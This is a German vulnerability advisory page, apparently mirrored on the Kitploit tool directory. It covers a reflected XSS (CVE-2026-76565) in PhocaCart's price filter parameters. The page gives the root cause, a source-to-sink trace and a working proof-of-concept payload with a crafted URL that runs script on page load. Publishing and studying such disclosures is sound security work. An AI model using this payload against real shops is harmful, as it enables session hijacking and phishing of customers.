Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
CVE-2026-76565 — Reflektiertes XSS über die Filterparameter price_from und price_to in PhocaCart | Kitploit
Tools/GitHubGitHub/toanln-cov/cve-2026-76565
SchwachstellenanalyseExploitationWebanwendungs-ExploitationWebsicherheitPapers & Forschung
GitHubtoanln-cov/cve-2026-76565

CVE-2026-76565

Reflektiertes XSS über die Filterparameter price_from und price_to in PhocaCart

Repository anzeigen
vor 3 TagenNoch nicht geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

Reflektiertes XSS über die Filterparameter price_from / price_to in PhocaCart

PhocaCart ≤ 6.1.7 — Nicht authentifizierter Angreifer injiziert beliebiges JavaScript über eine manipulierte Preis-Filter-URL

CVE CVSS v4.0 CWE-79 Affected Researcher


ZUSAMMENFASSUNG

PhocaCart 6.1.7 für Joomla ist anfällig für Reflected Cross-Site Scripting (XSS) über die GET-Parameter price_from und price_to, wenn das Modul mod_phocacart_filter installiert und veröffentlicht ist. Die Parameter werden mit Joomlas Eingabefilter 'string' verarbeitet, der nur strip_tags() anwendet – nicht jedoch . Die Rohwerte werden direkt in HTML--Attribute im Preisfilter-Formular ausgegeben, das vom Modul gerendert wird.

Tool herunterladen
htmlspecialchars()
value=""
mod_phocacart_filter

Ein Angreifer bringt einem Opfer eine manipulierte URL unter. Wenn das Opfer die Seite lädt, wird der injizierte Event-Handler im Browser des Opfers ausgeführt. Eine Authentifizierung ist nicht erforderlich. Der Angriff setzt voraus, dass mod_phocacart_filter (ein separat vertriebenes Modul) installiert und veröffentlicht ist.


BETROFFENE VERSIONEN

KOMPONENTEVERWUNDBARGETESTET AUFBEHOBEN
PhocaCart (com_phocacart) + mod_phocacart_filter≤ 6.1.7Joomla 5.4.7 + PhocaCart 6.1.7 + mod_phocacart_filter 6.1.66.1.8

DETAILS ZUR SCHWACHSTELLE

Typ: Reflected XSS (CWE-79) Authentifizierung erforderlich: Keine — öffentliches Shop-Frontend CSRF-Token erforderlich: Nein (GET-Anfrage) Sink-Datei: site/layouts/form_filter_horizontal_text.php:65,71

Grundursache

Joomlas Eingabefilter 'string' ruft strip_tags() auf – er entfernt HTML-Tags, lässt aber HTML-Sonderzeichen wie ", ' und > unkodiert. Die GET-Parameter price_from und price_to werden mit diesem Filter abgerufen und in $data['getparams'] gespeichert. Die Vorlagendateien geben diese Werte direkt in value=""-Attribute aus, ohne htmlspecialchars() aufzurufen, was eine Injektion im Attributkontext ermöglicht.

Datenfluss — von der Quelle zur Senke:

root@kitploit:~
GET ?price_from=" onmouseover="alert(document.domain)

  filter.php:831    $app->getInput()->get('price_from', '', 'string')
  └─ Joomla 'string' filter = strip_tags() only
     strip_tags('" onmouseover="alert(1)') → '" onmouseover="alert(1)'  [unchanged!]

  filter.php:494    $inA[] = $v  // no encoding
  └─ $data['getparams'] = ['" onmouseover="alert(document.domain)']

  form_filter_horizontal_text.php:65:
  └─ <input type="text" value="<?php echo $d['getparams'][0]; ?>" /> // → NO htmlspecialchars()
  → Renders: value="" onmouseover="alert(document.domain)"
  → XSS fires on mouseover

FORM_FILTER_HORIZONTAL_TEXT.PHP:65 — VERWUNDBARE SENKE

root@kitploit:~
<input type="text" class="form-control" name="pricefrom"
  value="<?php echo $d['getparams'][0]; ?>"   <!-- NO htmlspecialchars() -->
  id="phPriceFrom..." />

Dasselbe Sink-Muster existiert auch in form_filter_text.php:81,87 (Variante für das vertikale Layout). Beide Parameter price_from und price_to sind gleichermaßen anfällig.


KONZEPTNACHWEIS

1. Bösartige URL erstellen

Der Angreifer konstruiert eine URL, die auf die Ansicht der Shop-Artikel abzielt, mit einem in den Parameter price_from injizierten Event-Handler-Payload. Der Payload bricht aus dem value=""-Attributkontext aus.

root@kitploit:~
Payload (raw):     " autofocus onfocus="alert(document.domain)
URL-encoded:       %22%20autofocus%20onfocus%3D%22alert(document.domain)

Crafted URL:
http://TARGET/index.php?option=com_phocacart&view=items
  &price_from=%22%20autofocus%20onfocus%3D%22alert(document.domain)

2. Opfer lädt die Seite — XSS feuert beim Laden der Seite

Wenn das Opfer die manipulierte URL öffnet, rendert die Shop-Artikel-Seite das Preisfilter-Formular. Die injizierten Attribute sind im <input>-Element vorhanden. Mit dem autofocus onfocus-Payload wird JavaScript sofort beim Laden der Seite ausgeführt, ohne dass eine weitere Benutzerinteraktion erforderlich ist.

Gerendertes HTML (anfällig):

root@kitploit:~
<input type="text" class="form-control" name="pricefrom"
  value="" autofocus onfocus="alert(document.domain)"
  id="phPriceFromTopricefrom" />

XSS-Warndialog im Browser des Opfers — alert(document.domain) bestätigt die Ausführung im Shop-Frontend

XSS wird im Browser des Opfers ausgelöst — alert(document.domain) bestätigt den Ausführungskontext im Shop-Frontend


AUSWIRKUNGEN

  1. Diebstahl von Session-Cookies — Ein präparierter Payload kann das Session-Cookie des Opfers an einen vom Angreifer kontrollierten Server exfiltrieren und so die Übernahme des Kontos ermöglichen.
  2. Phishing / Erbeutung von Anmeldedaten — Der Payload kann das Opfer auf eine gefälschte, auf der Domäne des Angreifers gehostete Login-Seite umleiten und so Anmeldedaten unter dem vertrauenswürdigen Shop-Domänennamen erfassen.
  3. Verbreitung von Malware — Der vertrauenswürdige Ursprung des Shops kann missbraucht werden, um Drive-by-Downloads oder Exploit-Kits an Opfer zu liefern, die von Angreifern erstellte Links anklicken.

REFERENZEN

  • CVE: https://www.cve.org/CVERecord?id=CVE-2026-76565
  • NVD: https://nvd.nist.gov/vuln/detail/CVE-2026-76565
  • GitHub-Sicherheitshinweis: https://github.com/advisories/GHSA-2m94-2f44-8q5p
  • Repository des Anbieters: https://github.com/PhocaDesign/PhocaCart